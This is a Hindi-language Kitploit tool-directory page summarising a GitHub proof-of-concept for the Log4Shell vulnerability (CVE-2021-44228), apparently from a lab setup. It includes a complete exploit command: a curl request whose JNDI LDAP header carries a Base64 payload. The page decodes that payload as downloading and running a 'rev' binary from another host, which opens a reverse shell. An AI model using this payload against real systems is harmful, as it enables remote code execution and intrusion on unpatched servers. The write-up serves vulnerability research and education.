Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
LOG4J-CVE-2021-44228 — Log4Shell (CVE-2021-44228) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें LDAP सर्वर सेटअप, पेलोड जनरेशन, और शैक्षिक भेद्यता अनुसंधान के लिए पैकेट कैप्चर विश्लेषण शामिल है। | Kitploit
उपकरण/GitHubGitHub/sumitpathania03/log4j-cve-2021-44228
पैकेट स्निफिंग और विश्लेषणपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलArchived
GitHubsumitpathania03/log4j-cve-2021-44228

LOG4J-CVE-2021-44228

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4Shell (CVE-2021-44228) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें LDAP सर्वर सेटअप, पेलोड जनरेशन, और शैक्षिक भेद्यता अनुसंधान के लिए पैकेट कैप्चर विश्लेषण शामिल है।

रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

LOG4J-CVE-2021-44228

Log4Shell — जिसे CVE-2021-44228 के नाम से भी जाना जाता है — एक गंभीर कमजोरी है जो Apache Foundation के Log4j का उपयोग करने वाले सिस्टमों में रिमोट कोड निष्पादन को सक्षम बनाती है। Log4j एक ओपन-सोर्स जावा लाइब्रेरी है जो वाणिज्यिक और ओपन-सोर्स सॉफ्टवेयर उत्पादों और उपयोगिताओं में व्यापक रूप से उपयोग की जाती है।

0_6ImDNNYn_uGlIgog

POC विश्लेषण

कमजोर सर्वर पोर्ट 8080 पर चल रहा है

Screenshot 2023-04-11 115553

और ldap सर्वर दो पोर्ट http 8888 और ldap 1389 पर चल रहा है

Screenshot 2023-04-11 115631

एक्सप्लॉइट कमांड

curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'

{

172.17.0.2:8080 -- कमजोर सर्वर का IP

172.17.0.1:1389 -- LDAP सर्वर का IP

Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==

डिक्रिप्टेड कमांड - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev

}

पैकेट विश्लेषण

PACKETS

flowgraph

जैसा कि हम पैकेट्स में देख सकते हैं कि सर्वर LDAP सर्वर को एक क्लास के लिए GET अनुरोध भेज रहा है। यदि हम एक्सप्लॉइट क्लास की जाँच करें तो हम देख सकते हैं कि LDAP सर्वर एक्सप्लॉइट क्लास में डिक्रिप्टेड कमांड भेज रहा है।

EXP_CLASS

संदर्भ

https://github.com/simrotion13/log4shell-vulnerable-app

https://github.com/black9/Log4shell_JNDIExploit.git

टूल डाउनलोड करें